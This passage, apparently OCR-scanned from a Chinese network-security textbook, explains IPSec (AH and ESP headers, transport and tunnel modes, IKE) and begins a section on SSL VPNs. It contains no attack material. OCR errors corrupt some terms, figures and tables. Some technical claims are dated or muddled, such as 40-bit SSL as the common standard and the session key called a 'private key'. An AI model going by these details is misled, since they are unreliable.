新 与 备份 LNS 建立 连接 ,这 样 增加 了 VPN 服务 的 可 靠 性 和 容错 性 。 

(5) 统一 的 网 络 管理 。L2TP 协议 将 很 快 地 成 为 标准 的 RFC 协议 ,有 关 L2TP 的 标准 
MIB 也 将 很 快 地 得 到 制定 ,这 样 可 以 统一 地 采用 SNMP 网 络 管理 方案 方便 地 进行 网 络 维护 
与 管理 。 


8.4.8 IPSec 协议 
1. IPSec 协议 的 基本 原理 


Internet 协议 安全 性 (IPSec) 是 一 种 开放 标准 的 框架 结构 ,通过 使 用 加 密 的 安全 服务 以 
确保 在 Internet 上 进行 保密 而 安全 的 通信 。 

L2TP 等 都 没有 解决 隧道 加 密 和 数据 加 密 的 问题 。IPSec 协议 把 多 种 安全 技术 集合 到 
一 起 ,可 以 建立 一 个 安全 ,可 靠 的 隧道 。 这 些 技术 包括 : Diffie Hellman 密 钥 交换 技术 ， 
DES, RC4 IDEA 数据 加 密 技术 , 哈 希 散 列 算法 HMAC .MD5 SHA, 数字 签名 技术 等 。 

IPSec 是 一 套 协议 包 而 不 是 一 个 单个 的 协议 ,这 一 点 对 于 认识 IPSec 很 重要 。 协 议 包 主 
要 包括 IKE 互连网 密 钥 交换 .IPSec 协议 .AH 验证 包头 .ESP 加 密 数据 等 文件 。 

IPSec 给 出 了 应 用 于 IP 层 上 网 络 数据 安全 的 整套 用 于 认证 、 私 有 性 和 完整 性 的 标准 协 
议 ,包括 认证 报头 协议 (authentication header. AH)、 封 装 安全 载荷 协议 (encapsulating 
security payload. ESP) 、 密 钥 交换 协议 (Internet key exchange,IKE) 和 用 于 认证 及 加 密 的 算 
法 如 DES IDEA 等 。 

IPSec 是 一 个 第 三 层 VPN 协议 标准 ,规定 了 如 何在 对 等 层 之 间 选 择 安全 协议 ,安全 算 
法 和 密 钥 交 换 , 向 上 层 提供 访问 控制 .数据 源 验证 .数据 加 密 等 安全 服务 。 各 协议 之 间 的 关 
系 如 图 8-14 所 示 。 

(1) AH 为 PP 数据 包 提供 无 连接 的 数据 完整 性 和 数据 源 身份 认证 ,同时 具有 防 重 放 攻 
击 的 能 力 。 数 据 完 整 性 校 验 通过 消息 认证 码 (如 MD5) 产 生 的 校 验 值 来 保证 ; 数据 源 身份 
认证 通过 在 待 认证 的 数据 中 加 入 一 个 共享 密 钥 来 实现 ; AH 报头 中 可 以 防止 重 放 攻击 。 
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IPSec 体系 
封装 安全 负载 (ESP) 认证 报头 (AH) 
| | 
加 密 算法 认证 算法 
(DES、3DES、AES) (MD5、 SH-1) 


EI 


——€ 解释 域 (DOI) 一 
| 


密 钥 管理 " 


图 8-14 IPSec 体系 结构 


(2) ESP 为 IP 数据 包 提供 数据 的 保密 性 (通过 加 密 机 制 )、 无 连接 的 数据 完整 性 ,数据 
源 身份 认证 以 及 防 重 放 攻 击 保护 。 与 AH 相 比 ,数据 保密 性 是 ESP 的 新 增 功能 ,数据 源 身 
份 认证 ,数据 完整 性 检验 以 及 重 放 保护 都 是 AH 可 以 实现 的 。 

(3) AH 和 ESP 可 以 单独 使 用 ,也 可 以 配合 使 用 。 通 过 这 些 组 合 模式 ,可 以 在 两 台 
机 、 两 台 安全 网 管 (防火 墙 和 路 由 器 ) 或 者 主机 与 安全 网 关 之 间 配置 多 种 灵活 的 安全 机 制 。 

(4) 解释 域 DOT 将 所 有 的 IPSec 协议 捆绑 在 一 起 ,是 IPSec 安全 参数 的 主要 数据 库 。 

(5) 密 钥 管理 包括 IKE 协议 和 安全 联盟 (SA) 等 部 分 。IKE 在 通信 系统 之 间 建 立 安全 
联盟 ,提供 密 钥 管理 和 密 钥 确 定 的 机 制 ,是 一 个 产生 和 交换 密 钥 材料 并 协调 IPSec 参数 的 框 
架 。IKE 将 密 钥 协商 的 结果 保留 在 SA 中 , 供 AH 和 ESP 以 后 通信 时 使 用 。 

AH 和 ESP 都 支持 两 种 模式 : 传输 模式 和 隧道 模式 。 

传输 模式 IPSec 主要 对 上 层 协议 提供 保护 ,通常 用 于 两 个 主机 之 间 端 到 端的 通信 。 

隧道 模式 IPSec 提供 对 所 有 IP 包 的 保护 ,主要 用 于 安全 网 关 之 间 ,可 以 在 Internet. 上 
构成 VPN。 使 用 隧道 模式 ,在 防火 墙 之 后 内 部 网 的 一 组 主机 可 以 不 实现 IPSec 而 参加 安全 
通信 。 局 域 网 边界 的 防火 墙 上 的 IPSec 软件 会 建立 隧道 模式 SA ,主机 产生 的 未 保护 的 包 通 
过 隧道 连 到 外 部 网 络 。IPSec 提供 的 安全 业务 如 表 8-1 所 示 。 


表 8-1 IPSec 安全 业务 


安全 业务 | AH( 认 证 ) ESP( 加 密 ) ESP( 加 密 和 认证 ) 
访问 控制 v v v 
无 连接 数据 完整 性 v 
数据 来 源 认证 M 
对 重 发 数据 的 拒绝 v v 
保密 性 M y 
有 限 流 业务 的 保密 性 M 


237 


V 
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AN 


网 络 安全 技术 


2. IPSec 协议 的 结构 


IPSec 包括 3 个 基本 协议 : AH 协议 为 卫 包 提供 信息 源 验证 和 完整 性 保证 ; ESP 协议 
提供 加 密 保 证 ; ISAKMP 协议 提供 双方 交流 时 的 共享 安全 信息 。ESP 和 AH 都 有 相关 的 
一 系列 支持 文件 ,规定 了 加 密 和 认证 的 算法 。DOI 通过 一 系列 命令 算法、 属性、 参数 来 连 
接 所 有 的 IPSec 组 文件 。 

IPSec 通过 端 对 端的 安全 性 来 提供 主动 的 保护 以 防止 专用 网 络 与 Internet 的 攻击 。 在 
通信 中 ,只 有 发 送 方 和 接收 方才 是 唯一 必须 了 解 IPSec 保护 的 计算 机 。IPSec 在 IP 层 实现 ， 
因此 可 以 有 效 地 保护 各 种 上 层 协议 ,并 为 各 种 安全 服务 提供 一 个 统一 的 平台 。IPSec 适用 
F IPv4 和 IPv6。 

IPSec 基于 端 对 端的 安全 模式 ,在 源 IP 和 目标 IP 地 址 之 间 建 立信 任 和 安全 性 。 考 虑 认 
为 IP 地 址 本 身 没有 必要 具有 标识 ,但 IP 地 址 后 面 的 系统 必须 有 一 个 通过 身份 验证 程序 验 
证 过 的 标识 。 只 有 发 送 和 接收 的 计算 机 需要 知道 通信 和 是 安全 的 。 每 台 计算 机 都 假定 进行 通 
信 的 媒体 不 安全 ,因此 在 各 自 的 终端 上 实施 安全 设置 。 该 模式 允许 为 下 列 企业 方案 成 功 部 
署 IPSec: LAN, 客 户 端 /服务 器 和 对 等 网 络 ; WAN ,路 由 器 到 路 由 器 和 网 关 到 网 关 ; 远程 
访问 ,拨号 客户 机 和 从 专用 网 络 访问 Internet, 

通常 ,两 端 都 需要 IPSec 配置 ( 称 为 IPSec 策略 ) 来 设置 选项 与 安全 设置 ,以 允许 两 个 系 
统 对 如 何 保护 它们 之 间 的 通信 达成 协议 。Windows XP 和 Windows Server 2003 家 族 实施 
IPSec 是 基于 IETF IPSec 工作 组 开发 的 业界 标准 。IPSec 相关 服务 部 分 是 由 Microsoft 与 
Cisco 共同 开发 。 

IPSec 提供 了 两 种 安全 机 制 : 认证 和 加 密 。 认 证 机 制 使 TP 通信 的 数据 接收 方 能 够 确认 
数据 发 送 方 的 真实 身份 以 及 数据 在 传输 过 程 中 是 否 遭 复 改 ; 加 密 机 制 通过 对 数据 进行 编码 
来 保证 数据 的 机 密 性 ,以 防 数据 在 传输 过 程 中 被 穿 听 。AH 定义 了 认证 的 应 用 方法 ,提供 数 
据 源 认证 和 完整 性 保证 ; ESP 定义 了 加 密 和 可 选 认 证 的 应 用 方法 ,提供 可 靠 性 保证 。 在 实 
际 IP 通信 时 ,可 以 根据 实际 安全 需求 同时 使 用 这 两 种 协议 或 选择 使 用 其 中 的 一 种 。AH 和 
ESP 都 可 以 提供 认证 服务 ,不 过 AH 提供 的 认证 服务 要 强 于 ESP,IKE 用 于 密 钥 交 换 。 

1) AH 协议 

AH 协议 为 也 通 信 提 供 数据 源 认 证 、 数 据 完整 性 和 反 回 放 保证 , 它 能 保护 通信 和 免 受 复 
改 , 但 不 能 防止 窃听 ,适合 用 于 传输 非 机 密 数据 ,但 不 提供 数据 机 密 性 保护 。AH 的 工作 原 
理 是 在 每 一 个 数据 包 上 添加 一 个 身份 验证 报头 。 此 报头 包含 一 个 带 密 钥 的 Hash 散 列 ,此 
Hash 散 列 在 整个 数据 包 中 计算 ,因此 对 数据 的 任何 更 改 将 致使 散 列 无 效 一 一 这 样 就 提供 
了 完整 性 保护 。 

IPSec 认证 头 是 一 个 用 于 提供 IP 数据 报 完整 性 .数据 源 认 证 和 可 选 的 抗 重 放 保护 的 机 
制 ,其 完整 性 是 保证 数据 包 不 被 无 意 的 或 恶意 的 方式 改变 ,认证 则 验证 数据 的 来 源 。AH 为 
IP 包 提 供 尽 可 能 多 的 身份 认证 保护 ,认证 失败 的 包 将 被 丢弃 ,不 交 给 上 层 协 议 , 这 种 操作 
方式 可 以 减少 拒绝 服务 攻击 成 功 的 机 会 。AH 提供 IP 头 认证 ,也 可 以 为 上 层 协 议 提供 
认证 。 

(D AH 协议 头 格式 

AH 头 结构 如 表 8-2 所 示 。 
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表 8-2 AH 头 结构 
下 一 个 头 载荷 长 度 B 8 


安全 参数 索引 (security parameters index. SPD 


序列 号 (sequence number) 


认证 数据 ( 变 长 ) (authentication data) 


下 一 个 头 是 一 个 8 位 字段 ,识别 在 AH 报头 后 下 一 个 载荷 的 类 型 。 在 传输 模式 下 ， 
将 是 载荷 中 受 保护 的 上 层 协 议 的 值 , 比 如 UDP 或 TCP 的 值 。 在 隧道 模式 下 ,标识 
IPv4 封装 时 ,这 个 值 为 4, 表示 IP-in-IP(IPv4) 封 装 ; 标识 IPv6 封装 时 ,这 个 值 为 
41 ,表示 IP-in-IP(IPv6) 封 装 。 

载荷 长 度 是 一 个 8 位 字段 ,标识 AH 报头 的 长 度 。 

预 留 字段 是 一 个 16 位 字段 。 

SPI 是 一 个 任意 32 位 的 值 , 和 外 部 TP. 的 目的 地 址 一 起 用 于 识别 数据 报 的 安全 联盟 。 
序列 号 为 32 位 字段 ,不 允许 重复 ,唯一 地 标识 了 每 一 个 发 送 数据 包 ,为 安全 关联 提 
供 反 回放 保护 。 接 收 端 校 验 序列 号 为 该 字段 值 的 数据 包 是 否 已 经 被 接收 过 ,若是 ， 
则 拒 收 该 数据 报 。 

认证 数据 是 一 个 可 变 长 度 的 字段 ,32 位 的 整数 倍 ; 包含 完整 性 校 验 值 (ICV) 。 接 收 
端 收 到 数据 包 后 ,首先 执行 Hash 计算 ,再 与 发 送 端 所 计算 的 该 字段 值 比较 , 若 两 者 
相等 ,表示 数据 完整 ; 若 在 传输 过 程 中 数据 遭 修 改 , 两 个 计算 结果 不 一 致 , 则 丢弃 该 
数据 包 。 


(2) AH 的 工作 模式 
AH 的 工作 模式 有 传输 模式 和 隧道 模式 两 种 。 原 始 IP 报 如 图 8-15 所 示 。 


图 8-15 原始 全 报 


传输 模式 AH 使 用 原来 的 TP 报头 ,把 AH dite TP 报头 的 后 面 ,如 图 8-16 所 示 。 


除了 可 变 字段 以 外 都 被 认证 
La A 


原始 IP 报 头 AH TCP 数据 


图 8-16 AH 传输 模式 


隧道 模式 AH 把 需要 保护 的 IP 报 封装 在 新 的 IP 报 中 ,作为 新 报 文 的 载荷 ,然后 把 
AH 插 在 新 的 TP 报头 的 后 面 ,如 图 8-17 所 示 。 


除了 新 IP 报 头 中 的 可 变 字段 以 外 都 被 认证 


a ^ 
新 IP 报 头 AH 原始 IP 报 汰 ”TCP 数据 


8-17 AH 隧道 模式 
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图 8-18 显示 了 两 种 使 用 IPSec 鉴别 服务 的 模式 。 一 种 是 在 服务 器 和 客户 机 之 间 直 接 
提供 鉴别 服务 ; 工作 站 可 以 与 服务 器 同 在 一 个 网 络 中 ,也 可 以 在 外 部 网 络 中 ; 只 要 工作 站 
和 服务 器 共享 受 保护 的 密 钥 ,鉴别 处 理 就 是 安全 的 ,使 用 传输 模式 的 SA。 另 一 种 是 远程 工 
作 站 向 公司 的 防火 墙 鉴别 自己 的 身份 ,或 是 为 了 访问 整个 内 部 网 络 , 或 是 因为 请 求 的 服务 器 
不 支持 鉴别 特征 ,使 用 隧道 模式 的 SA. 


服务 器 
端 到 端 鉴别 


图 8-18 两 种 使 用 IPSec 鉴别 服务 的 模式 


2) ESP 协议 

ESP 协议 ,为 IP 数据 包 提供 数据 的 保密 性 (加 密 )、 无 连接 的 数据 完整 性 、 数 据 源 身份 认 
证 以 及 防 重 放 攻击 保护 。 其 中 数据 保密 性 是 ESP 的 基本 功能 ,而 数据 源 身份 认证 ,数据 完 
整 性 检验 以 及 重 放 保护 都 是 可 选 的 。ESP 本 身 是 一 个 IP, 协 议 号 是 50 。 

ESP 可 以 单独 使 用 ,也 可 以 和 AH 结合 使 用 。 一般 ESP 不 对 整个 数据 包 加 密 ,而 是 只 
加 密 IP 包 的 有 效 载荷 部 分 ,不 包括 IP 头 。 但 在 端 到 端的 隧道 通信 中 ,ESP 需要 对 整个 数据 
包 加 密 。 

(1) ESP 协议 头 格式 

ESP 协议 头 格式 如 表 8-3 所 示 。 

X 8-3 ESP 协 议 头 
安全 参数 索引 (security parameters index, SPI) 
序列 号 (sequence number) 
载荷 数据 ( 变 长 ) (payload data) 


填充 字段 (0 一 255B) 
[ aake | ”下 一 个 关 


认证 数据 ( 变 长 ) (authentication data) 


。 SPI 是 32 位 的 必 选 字段 ,与 目标 地 址 和 协议 (ESP) 结 合 起 来 唯一 标识 处 理 数据 包 的 
特定 SA。 数值 可 任 选 ,一 般 在 IKE 交换 过 程 中 由 目标 主机 选 定 。SPI 经 过 验证 ,但 
是 不 加 密 。 

。 序列 号 是 32 位 的 必 选 字段 ,是 一 个 单 向 递增 的 计数 器 。 对 序列 号 的 处 理由 接收 端 
确定 。 当 建立 一 个 SA 时 ,发送 者 和 接收 者 的 序列 号 都 设置 为 0。 如 果 使 用 抗 回放 
服务 ,传送 的 序列 号 不 允许 循环 。 序 列 号 经 过 验证 ,但 是 不 加 密 。 

， 载荷 数据 是 变 长 的 必 选 字段 , 整 字 节 数 长 。 包 含有 下 一 个 报头 字段 描述 的 数据 。 加 
密 同步 数据 ,可 能 包含 加 密 算法 需要 的 初始 化 向 量 (IV),IV 是 没有 加 密 的 。 
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由 于 加 密 算法 可 能 要 求 整数 倍 字 节 数 , 而 且 为 了 保证 认证 数据 字段 对 齐 以 及 隐藏 载 
荷 的 真实 长 度 ,实现 部 分 通信 流 保密 ,那么 就 需要 填空 项 。 填 空 内 容 与 指定 提供 机 
密 性 的 加 密 算法 有 关 。 发 送 者 可 添加 0~255B。 
填充 长 度 字段 是 一 个 必 选 字段 , 它 表示 填充 字段 的 长 度 , 合 法 的 填充 长 度 是 0~ 
255B,0 表示 没有 填充 。 
下 一 个 头 是 8b 长 的 必 选 字段 ,表示 在 载荷 中 的 数据 类 型 。 隧 道 模式 下 ,这 个 值 是 4， 
表示 IP-in-IP; 传输 模式 下 是 载荷 数据 的 类 型 ,由 RFC 1700 定义 ,如 TCP 为 6。 
验证 数据 是 变 长 的 可 选 字 段 , 只 有 SA 中 包含 了 认证 业务 时 , 才 包含 这 个 字段 。 认 
证 算法 必须 指定 认证 数据 的 长 度 、 比 较 规则 和 验证 步骤 。 

(2) ESP 的 工作 模式 

ESP 工作 模式 包括 传输 模式 和 隧道 模式 两 种 ,如 图 8-19 和 图 8-20 所 示 。 它 们 的 差别 
决定 了 ESP 保护 的 真正 对 象 是 什么 。 在 传输 模式 下 ,ESP 头 插 在 IP 报头 和 IP 报 的 上 层 协 
议 之 间 ; 在 隧道 模式 下 ,整个 受 保护 的 IP 报 都 封装 在 一 个 ESP 头 中 ,还 增加 了 一 个 新 的 IP 

图 8-19 显示 了 使 用 ESP 服务 的 传输 模式 ,图 8-20 显示 了 使 用 ESP 服务 的 隧道 模式 。 
图 8-19 直接 在 两 个 主机 之 间 提 供 加 密 ( 和 可 选 的 鉴别 ) 服 务 ,图 8-20 显示 了 怎样 使 用 隧道 
模式 来 建立 VPN。 


传输 模式 的 端 
到 端 会 话 加 密 


图 8-20 ESP 的 隧道 模式 
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图 8-20 的 ESP 隧道 模式 的 例子 中 ,一 个 组 织 有 4 个 专用 网 络 通过 Internet 连接 起 来 。 
内 部 网 络 上 的 主机 使 用 Internet 是 为 了 传输 数据 ,而 不 是 同 其 他 基于 Internet 的 主机 进行 
交互 。 通 过 在 每 个 内 部 网 络 的 安全 网 关上 终止 隧道 ,允许 主机 避免 实现 安全 能 力 。 

前 一 种 技术 通过 传输 模式 SA 来 支持 ,而 后 一 种 技术 使 用 了 隧道 模式 SA, 

(3) ESP 传输 模式 

传输 模式 的 ESP 用 于 对 IP 携带 的 数据 (例如 TCP 报 文 段 ) 进 行 加 密 和 可 选 的 鉴别 ,如 
图 8-21 所 示 。 对 于 使 用 IPv4 的 情况 ,ESP 报头 被 插 在 IP 包 中 紧 靠 传输 层 报头 (如 TCP, 
UDP 和 ICMP) 之 前 的 位 置 ,而 ESP 尾部 (填充 .填充 长 度 和 下 个 报头 字段 ) 被 放置 在 TP 报 
之 后 ; 如 果 选 择 了 鉴别 服务 , 则 ESP 鉴别 数据 字段 被 附加 在 ESP 尾部 之 后 。 整 个 传输 级 报 
文 段 加 上 ESP 尾部 被 加 密 ,鉴别 覆盖 了 所 有 的 密 文 与 ESP 报头 。 


被 鉴别 


被 加 密 
MÀ 


原始 IP 报 头 | ESP 报 头 | TCP | 数据 | ESP 尾 部 | ESP 鉴 别 


图 8-21 ESP 传输 模式 的 加 密 和 鉴别 


传输 模式 的 操作 可 以 总 结 如 下 。 

(D 在 源 站 ,由 ESP 尾部 加 上 整个 传输 级 的 报 文 段 组 成 的 数据 块 被 加 密 , 这 个 数据 块 的 
明文 被 其 密 文 所 代替 ,以 形成 用 于 传输 的 卫 包 。 如 果 ” 鉴 别 ? 选 项 被 选中 ,还 要 加 上 鉴别 。 

O 包 被 路 由 到 目的 站 。 每 个 中 间 路 由 器 都 需要 检查 和 处 理 IP 报头 加 上 任何 明文 的 TP 
扩展 报头 ,但 是 不 需要 检查 密 文 。 

@ 目的 节点 检查 和 处 理 IP 报头 加 上 任何 明文 的 TP 扩展 报头 。 然 后 ,在 ESP 报头 的 
SPI 基 础 上 目的 节点 对 包 的 其 他 部 分 进行 解密 以 恢复 明文 的 传输 层 报 文 段 。 

传输 模式 操作 为 使 用 它 的 任何 应 用 程序 提供 了 机 密 性 ; 因此 避免 了 在 每 一 个 单独 的 应 
用 程序 中 实现 机 密 性 ,这 种 模式 的 操作 也 是 相当 有 效 的 ,几乎 没有 增加 TP. 包 的 总 长 度 。 这 
种 模式 的 一 个 缺陷 在 于 对 传输 的 包 进行 通信 量 分 析 是 可 能 的 。 

(4) ESP 隧道 模式 

隧道 模式 的 ESP 用 于 对 整个 IP 包 进 行 加 密 ,如 图 8-22 所 示 。 在 这 种 模式 下 ,在 包 的 前 
面 加 上 ESP 报头 ,然后 对 包 加 上 ESP 的 尾部 进行 加 密 。 这 种 模式 可 以 对 抗 通信 量 分 析 。 


被 鉴别 


被 加 密 | 


新 IP 报 头 | ESP 报 头 | ”原始 IP 报 头 TCP | 数据 |ESP 尾 部 |ESP 鉴 别 


图 8-22 ESP 隧道 模式 加 密 


因为 TP 报头 中 包含 了 目的 地 址 、 可 能 的 源 站 路 由 选择 指示 和 逐 跳 选 项 信息 ,所 以 简单 
的 传输 前 面 附加 了 ESP 报头 加 密 的 IP 包 是 不 可 能 的 。 中 间 的 路 由 器 不 能 处 理 这 样 的 包 ， 
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因此 用 一 个 新 的 IP 报头 来 包装 整个 块 , 这 个 新 的 IP 报头 将 包含 用 于 路 由 选择 的 足够 信息 ， 
但 不 能 进行 通信 量 的 分 析 。 

传输 模式 对 于 保护 两 个 支持 ESP 的 主机 之 间 的 连接 是 合适 的 ,而 隧道 模式 对 于 那些 包 
含 了 防火 墙 或 其 他 种 类 的 安全 网 关 的 配置 是 有 用 的 。 在 后 一 种 情况 下 ,加 密 只 发 生 在 外 部 
主机 和 安全 网 关 之 间或 者 两 个 安全 网 关 之 间 ,这样 使 得 内 部 网 络 的 主机 解脱 了 处 理 加 密 的 
责任 ,并 且 通 过 减少 需要 密 钥 的 数量 而 简化 密 钥 分 配 的 任务 。 

考虑 这 样 一 种 情况 : 外 部 主机 想 要 与 被 防火 墙 保护 的 内 部 网 络 上 的 主机 进行 通信 ,并 
旦 在 外 部 主机 和 防火 墙 上 都 实现 了 ESP。 当 外 部 主机 向 内 部 主机 传输 传输 层 的 报 文 段 时 ， 
其 步 又 如 下 。 

O 源 主 机 准备 目的 地 址 是 目标 主机 的 内 部 卫 包 。 在 这 个 包 的 前 面 加 上 ESP 报头 , 然 
后 对 包 和 ESP 尾部 进行 加 密 , 并 且 可 能 增加 鉴别 数据 。 再 用 目的 地 址 是 防火 墙 的 新 的 IP 
报头 对 结果 数据 块 进行 包装 ,这 样 形成 了 外 部 的 了 P 包 。 

@ 外 部 包 被 路 由 到 目的 防火 墙 。 每 个 中 间 路 由 器 都 要 检查 和 处 理 TP 报头 加 上 任何 外 
部 IP 扩展 报头 ,但 不 需要 检查 密 文 。 

@ 目的 防火 墙 检查 和 处 理 外 部 IP 报头 加 上 任何 外 部 TP 扩展 报头 。 然 后 ,在 ESP 报头 
SPI 字段 的 基础 上 ,目的 防火 墙 对 包 的 剩余 部 分 进行 解密 ,已 恢复 明文 的 内 部 卫 包 。 然 后 ， 
这 个 包 在 内 部 网 络 中 传输 。 

@ 内 部 包 在 内 部 网 络 中 经 过 零 个 或 多 个 路 由 器 到 达 了 目的 主机 。 

3) IKE 协议 

IKE 协议 ,在 IPSec 保护 一 个 包 之 前 ,需要 先 建立 一 个 SA。SA 可 以 手工 建立 ,也 可 以 
自动 建立 。 当 用 户 数量 不 多 ,而 且 密 钥 的 更 新 频率 不 高 时 ,手工 建立 SAs 当 用 户 较 多 ,网 络 
规模 较 大 时 ,自动 建立 SA. IKE 是 一 种 用 来 自动 管理 SA 的 协议 ,包括 建立 ,协商 ,修改 和 
删除 SA 等 。 

IKE 包括 ISAKMP、Oaklay 和 SKEME 这 3 个 协议 。ISAKMP 定义 了 包 格 式 、 重 发 计 
数 器 以 及 消息 构建 要 求 ,定义 了 整套 加 密 通 信 语 言 ， Oakley 和 SKEME 定义 了 通信 双方 建 
立 一 个 共享 的 验证 密 钥 所 必须 采取 的 步骤 。IKE 利用 ISAKMP 语言 对 这 些 步 又 以 及 其 他 
信息 交换 措施 进行 表述 。 

IKE 利用 ISAKMP 语言 来 定义 密 钥 交换 ,是 对 安全 服务 进行 协商 的 手段 。 最 终结 果 是 
一 个 通过 验证 的 密 钥 以 及 建立 在 双方 同意 基础 上 的 安全 服务 (IPSec SA)。IKE 使 用 了 两 
个 阶段 的 ISAKMP。 第 一 阶段 建立 IKE 的 SA, 第 二 阶段 利用 这 个 既定 的 SA 为 IPSec 协 
商 具体 的 SA。 


8.4.9 SSL 协议 


一 项 最 新 的 研究 表明 , 近 90% 的 企业 利用 VPN 进行 的 内 部 网 和 外 部 网 的 连接 只 是 用 
来 进行 Web 访问 和 电子 邮件 通信 ,10% 的 用 户 利用 诸如 聊天 协议 和 私有 客户 端 应 用 。 而 这 
90% 的 应 用 可 以 利用 一 种 更 加 简单 .成 本 更 低 的 VPN 技术 一 一 SSL VPN 来 提供 更 加 有 效 
的 解决 方案 。 
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1. SSL 的 概念 


SSL 是 secure sockets layer 的 缩写 ,中 文 名 为 “安全 套 接 层 协 议 层 ”, 是 一 种 在 Web 服 
务 协 议 (HTTP) 和 TCP/IP 之 间 提 供 数据 连接 安全 性 的 协议 。 它 为 TCP/IP 连接 提供 数据 
加 密 、 用 户 和 服务 器 身份 验证 以 及 消息 完整 性 验证 。SSL 被 视 为 因特网 上 Web 浏览 器 和 服 
务 器 的 安全 标准 。 


2. SSL VPN 的 功能 


SSL 安全 协议 主要 提供 3 方面 的 安全 服务 。 

(1) 用 户 和 服务 器 的 合法 性 认证 。 认 证 用 户 和 服务 器 的 合法 性 ,使 得 它们 能 够 确信 数 
据 将 被 发 送 到 正确 的 客户 机 和 服务 器 上 。 客 户 机 和 服务 器 都 有 各 自 的 识别 号 ,这 些 识别 号 
由 公开 密 钥 进行 编号 ,为 了 验证 用 户 是 否 合法 ,安全 套 接 层 协议 要 求 在 握手 交换 数据 时 进行 
数字 认证 ,以 此 确保 用 户 的 合法 性 。 

(2) 加 密 数 据 以 隐藏 被 传送 的 数据 。SSL 所 采用 的 加 密 技 术 既 有 对 称 密 钥 技术 ,也 有 
公开 密 钥 技术 。 在 客户 机 与 服务 器 进行 数据 交换 之 前 ,交换 SSL 初始 握手 信息 ,在 SSL 握 
手 信 息 中 采用 了 各 种 加 密 技术 对 其 加 密 ,以 保证 其 机 密 性 和 数据 完整 性 ,并 且 用 数字 证 书 进 
行 鉴 别 ,这 样 可 以 防止 非法 用 户 破译 。 

(3) 保护 数据 的 完整 性 。SSL 采用 Hash 函数 和 机 密 共享 的 方法 提供 信息 的 完整 性 服 
务 , 建 立 客户 机 与 服务 器 之 间 的 安全 通道 ,所 有 经 过 SSL 处 理 的 业务 在 传输 过 程 中 完整 准 
确 无 误 地 到 达 目 的 地 。 


3, SSL VPN 的 工作 机 制 


SSL 包括 两 个 阶段 : 握手 和 数据 传输 。 在 握手 阶段 ,客户 端 和 服务 器 用 公 钥 加 密 算法 
计算 出 私 钥 ; 在 数据 传输 阶段 ,客户 端 和 服务 器 都 用 私 钥 来 加 密 和 解密 传输 过 来 的 数据 。 

SSL 客户 端 在 TCP 连接 建立 之 后 ,发 出 一 个 Hello 消息 来 发 起 握手 ,这 个 消息 包括 自 
己 可 实现 的 算法 列表 和 其 他 需要 的 消息 。SSL 的 服务 器 回应 一 个 类 似 Hello 的 消息 ,这 里 
面 确定 了 此 次 通信 所 需要 的 算法 ,然后 发 送 自己 的 证 书 。 客 户 端 在 收 到 这 个 消息 后 会 生成 
一 个 消息 ,用 SSL 服务 器 的 公 钥 加 密 后 传送 过 去 ,SSL 服务 器 用 自己 的 私 钥 解密 后 ,会 话 密 
钥 协 商 成 功 ,双方 用 私 钥 算法 来 进行 通信 。 

证 书 实质 上 是 标明 服务 器 身份 的 一 组 数据 ,一 般 第 三 方 作为 CA, 生 成 证 书 ,并 验证 它 
的 真实 性 。 为 获得 证 书 , 服 务 器 必须 用 安全 信道 向 CA 发 送 它 的 公 钥 。CA 生成 证 书 , 包 括 
它 自己 的 ID、 服务 器 的 ID 服务 器 的 公 铀 和 其 他 信息 。 然 后 CA 利用 消息 摘要 算法 生成 证 
书 指纹 ,最 后 ,CA 用 私 钥 加 密 指 纹 生成 证 书签 名 。 

为 证 明 服务 器 的 证 书 合法 ,客户 端 首先 利用 CA 的 公 钥 解密 签名 读 取 指 纹 , 然 后 计算 服 
务 器 发 送 的 证 书 指纹 ,如 果 两 个 指纹 不 相符 ,说 明证 书 被 算 改 过 。 当 然 , 为 解密 签名 ,客户 端 
必须 事先 可 靠 地 获得 CA 的 公 钥 。 客 户 端 保存 一 个 可 信赖 的 CA 和 它们 的 公 钥 清单 。 当 客 
户 端 收 到 服务 器 的 证 书 时 ,要 验证 证 书 的 CA 在 它 所 保存 的 清单 之 列 。CA 的 数量 很 少 ,一 
般 通 过 网 站 公布 它们 的 公 钥 。 很 多 浏览 器 把 主要 的 CA 的 公 钥 直接 编 人 到 它们 的 源码 中 。 
一 旦 服务 器 通 过 了 客户 端的 鉴别 ,两 者 就 已 经 通过 公 钥 算法 确定 了 私 钥 信 息 。 当 两 边 均 表 
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示 做 好 了 私 钥 通 信 的 准备 后 ,用 完成 (Finished) 消 息 来 结束 握手 过 程 ,它们 的 连接 进入 数据 
传输 阶段 。 在 数据 传输 过 程 中 ,两 端 都 将 发 送 的 消息 拆 分 成 片段 ,并 附 上 MAC( 散 列 值 )。 
传送 时 ,客户 端 和 服务 器 将 数据 片段 .MAC 和 记录 头 结合 起 来 并 用 密 钥 加 密 形 成 完整 的 
SSL 接收 时 ,客户 端 和 服务 器 解密 数据 包 , 计 算 MAC, 并 比较 计算 得 到 的 MAC 和 接收 到 
的 MAC。 


4. secure socket layer(SSL) 协 议 


SSL 目前 通用 规格 为 40b 安全 标准 ,美国 已 推出 128b 高 安全 标准 。SSL 协议 位 于 
TCP/IP 与 各 种 应 用 层 协议 之 间 ,为 数据 通信 提供 安全 支持 。SSL 协议 可 分 为 两 层 : SSL id 
录 协 议 (SSL record protocol) , 它 建立 在 可 靠 的 传输 协议 (如 TCP ÈE ,为 高 层 协议 提供 数 
据 封装 .压缩 ,加密 等 基本 功能 的 支持 ;SSL 握手 协议 (SSL handshake protocol) , 它 建 立 在 
SSL 记录 协议 之 上 ,用 于 在 实际 的 数据 传输 开始 前 ,通信 双方 进行 身份 认证 ,协商 加 密 算 
法 ,交换 加 密 密 钥 等 。 

1) SSL 协议 的 工作 流程 

CD 服务 器 认证 阶段 : 

CD 客户 端 向 服务 器 发 送 一 个 开始 信息 “Hello" 以 便 开 始 一 个 新 的 会 话 连接 ; 

@ 服务 器 根据 客户 的 信息 确定 是 否 需要 生成 新 的 主 密 钥 ,如 需要 则 服务 器 在 响应 客户 
的 "Hello” 信 息 时 将 包含 生成 主 密 钥 所 需 的 信息 ; 

@ 客户 根据 收 到 的 服务 器 响应 信息 ,产生 一 个 主 密 钥 ,并 用 服务 器 的 公开 密 钥 加 密 后 
传 给 服务 器 ; 

@ 服务 器 恢复 该 主 密 钥 ,返回 给 客户 一 个 用 主 密 钥 认 证 的 信息 ,以 此 让 客户 认证 服 
54. 

(2) 用 户 认 证 阶段 : 在 此 之 前 ,服务 器 已 经 通过 了 客户 认证 ,这 一 阶段 主要 完成 对 客户 
